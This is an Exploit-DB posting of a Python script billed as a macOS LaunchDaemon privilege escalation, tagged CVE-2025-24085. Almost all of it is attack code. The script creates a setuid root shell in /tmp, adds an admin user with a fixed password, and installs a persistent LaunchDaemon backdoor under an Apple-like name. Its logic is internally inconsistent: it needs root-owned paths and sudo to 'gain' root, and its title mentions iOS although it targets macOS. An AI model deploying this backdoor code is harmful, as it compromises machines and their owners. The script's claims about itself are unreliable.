macOS LaunchDaemon iOS 17.2 - Privilege Escalation

EDB-ID:

52316




Platform:

macOS

Date:

2025-06-05


#!/usr/bin/env python3
# Exploit Title: macOS LaunchDaemon iOS 17.2 - Privilege Escalation
# Author: Mohammed Idrees Banyamer (@banyamer_security)
# GitHub: https://github.com/mbanyamer
# Date: 2025-05-31
# Tested on: macOS Sonoma (14.x ARM64 / x86_64)
# CVE: CVE-2025-24085
# Type: Local Privilege Escalation
# Platform: macOS
# Author Country: Jordan
# Description: 
# This local privilege escalation exploit leverages a vulnerable macOS LaunchDaemon plist configuration to execute
# arbitrary commands with root privileges. The exploit creates a root payload script that adds a root shell binary,
# creates an admin user, and installs a persistent LaunchDaemon backdoor for root access. It hijacks the 
# com.apple.securemonitor LaunchDaemon plist to trigger the payload, allowing unauthorized escalation to root 
# on macOS Sonoma systems.

import os
import plistlib
import time
from pathlib import Path

LAUNCHD_PLIST = "/Library/LaunchDaemons/com.apple.securemonitor.plist"
PAYLOAD_SCRIPT = "/tmp/.macroot_payload.sh"

def create_payload():
    print("[+] Creating root payload script...")
    payload = """#!/bin/bash
# Root shell
cp /bin/bash /tmp/.rootbash
chmod +s /tmp/.rootbash
chown root:wheel /tmp/.rootbash

# Add admin user
sysadminctl -addUser pentest -password macOS123! -admin

# Log file
echo "[+] Root backdoor triggered at $(date)" >> /tmp/.rootlog

# Persistent backdoor
cat <<EOF > /Library/LaunchDaemons/com.apple.backdoor.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.apple.backdoor</string>
  <key>ProgramArguments</key><array><string>/tmp/.rootbash</string></array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
EOF
chmod 644 /Library/LaunchDaemons/com.apple.backdoor.plist
chown root:wheel /Library/LaunchDaemons/com.apple.backdoor.plist
"""
    with open(PAYLOAD_SCRIPT, "w") as f:
        f.write(payload)
    os.chmod(PAYLOAD_SCRIPT, 0o755)

def hijack_launchdaemon():
    print("[+] Hijacking LaunchDaemon plist...")
    if not Path(LAUNCHD_PLIST).exists():
        # create a fake one
        print("[*] Creating fake LaunchDaemon plist for exploitation...")
        plist_data = {
            'Label': 'com.apple.securemonitor',
            'ProgramArguments': [PAYLOAD_SCRIPT],
            'RunAtLoad': True,
        }
        with open(LAUNCHD_PLIST, "wb") as f:
            plistlib.dump(plist_data, f)
    else:
        # hijack existing one
        with open(LAUNCHD_PLIST, 'rb') as f:
            plist = plistlib.load(f)
        plist['ProgramArguments'] = [PAYLOAD_SCRIPT]
        plist['RunAtLoad'] = True
        with open(LAUNCHD_PLIST, 'wb') as f:
            plistlib.dump(plist, f)

    os.system(f"chmod 644 {LAUNCHD_PLIST}")
    os.system(f"chown root:wheel {LAUNCHD_PLIST}")

def trigger_payload():
    print("[+] Triggering LaunchDaemon manually...")
    os.system(f"sudo launchctl load -w {LAUNCHD_PLIST}")
    print("[+] Done. You can now execute /tmp/.rootbash -p for root shell")

def main():
    if os.geteuid() == 0:
        print("[!] You are already root. No need to exploit.")
        return
    create_payload()
    hijack_launchdaemon()
    print("[+] Exploit completed. Reboot or run manually:")
    print(f"    sudo launchctl load -w {LAUNCHD_PLIST}")
    print("    Then run: /tmp/.rootbash -p")

if __name__ == "__main__":
    main()